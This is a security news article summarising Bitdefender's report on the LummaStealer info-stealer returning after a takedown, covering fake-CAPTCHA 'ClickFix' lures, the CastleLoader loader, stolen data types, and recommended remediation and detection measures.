LummaStealer returns post-takedown with ClickFix ruse

Bitdefender has reported a renewed surge in LummaStealer infections, with attackers using fake CAPTCHA pages and prompting users to execute commands months after a law enforcement action disrupted thousands of domains tied to the operation.

After a major 2025 takedown that disrupted more than 2,300 command-and-control domains, the LummaStealer ecosystem rebuilt quickly. Bitdefender reported a shift to bulletproof hosting providers, along with new loaders and delivery techniques.

LummaStealer is an information-stealing malware family that targets Windows systems. It collects credentials, session data and other sensitive information that can be reused for account takeovers and financial theft.

Social engineering

Current campaigns rely more on social engineering than software vulnerabilities, according to Bitdefender. Victims are typically infected after choosing to run a malicious file or following instructions that trigger attacker-supplied commands.

Attackers continue to use familiar lures, including fake cracked software and bogus game or media downloads. Newly released movie downloads also appear, along with abuse of trusted platforms as distribution channels.

Bitdefender noted that people seeking pirated or unofficial software often expect security warnings. That expectation can lead them to dismiss alerts that would otherwise raise suspicion.

Fake CAPTCHAs

A growing number of campaigns use fake CAPTCHA pages, a tactic often referred to as "ClickFix". The approach turns a routine web interaction into direct command execution on the victim's system.

In these scenarios, the victim is instructed to paste and run the clipboard content. The malicious site has already placed a PowerShell command on the clipboard. When the user executes it, the command retrieves and runs the next stage from attacker-controlled infrastructure.

Bitdefender described the method as one that depends on procedural trust and familiar-looking steps. Because no software flaw is required for initial access, traditional patching is less effective as a primary defence.

CastleLoader link

Bitdefender linked much of the recent increase in LummaStealer activity to CastleLoader, a modular loader used to deliver the malware. The loader uses scripts and runs in stages.

CastleLoader decrypts and loads payloads in memory, and establishes persistence by creating Startup shortcuts and scheduled tasks. Bitdefender added that it uses flexible command-and-control communication to support broad malware distribution and follow-on payload delivery.

Attackers also abuse legitimate Windows utilities and so-called living-off-the-land binaries. This blends malicious actions with normal operating system activity and complicates detection.

Bitdefender observed infrastructure overlap between CastleLoader and LummaStealer, including shared domains and hosting resources. The overlap suggests coordination between developer teams or the use of shared service providers within a broader malware-as-a-service marketplace.

Service Model

LummaStealer has operated as malware-as-a-service since emerging in late 2022. Bitdefender said subscription pricing in 2023 ranged from $250 to $20,000 for premium packages, pointing to a tiered commercial structure for criminal affiliates.

During the one month between December 12 and January 12, Bitdefender observed active infections globally. The highest concentration was in India, followed by the United States and parts of Europe. Targeting can shift quickly because affiliates decide where to focus distribution.

Once installed, LummaStealer gathers browser-stored credentials and authentication cookies, active session tokens and two-factor authentication tokens. It also targets cryptocurrency wallets and private keys, as well as password manager data and remote access tool data.

The malware can also collect email and FTP client credentials, VPN configuration files, personal documents and financial records, and system metadata such as operating system version and installed apps. Bitdefender also cited Discord and Steam data collection in cases where CastleLoader is part of the infection chain.

Impact and response

Stolen credentials and sessions can enable account takeover without password resets triggering alerts, Bitdefender said. Compromised email accounts can then be used to reset access to other services. Stolen cryptocurrency data can lead to direct theft or resale on criminal marketplaces.

Because the infection chain depends heavily on user interaction, Bitdefender urged a combined focus on behavioural awareness and technical controls. Users should avoid untrusted download sources, especially those advertising cracked or free software, games or media.

It also warned that any website instructing users to manually execute PowerShell or command-line instructions should be treated as malicious by default.

Remediation should go beyond removing the malware. Bitdefender recommended rotating passwords and invalidating active sessions, prioritising email, financial and work-related accounts. In some cases, a full operating system reinstall may be required.

For organisations, Bitdefender pointed to multi-factor authentication, user education on social engineering, and behavioural detection that flags suspicious process chains, abuse of legitimate system tools, anomalous DNS activity consistent with CastleLoader behaviour, and unusual authentication patterns.

Bitdefender researchers said that because LummaStealer relies heavily on user interaction, mitigation requires behavioural awareness alongside technical controls.

Bitdefender said the continued use of ClickFix and CastleLoader reflects a shift toward delivery methods that are harder to disrupt through domain takedowns and signature-based detection, with attackers increasingly presenting initial access as routine user behaviour.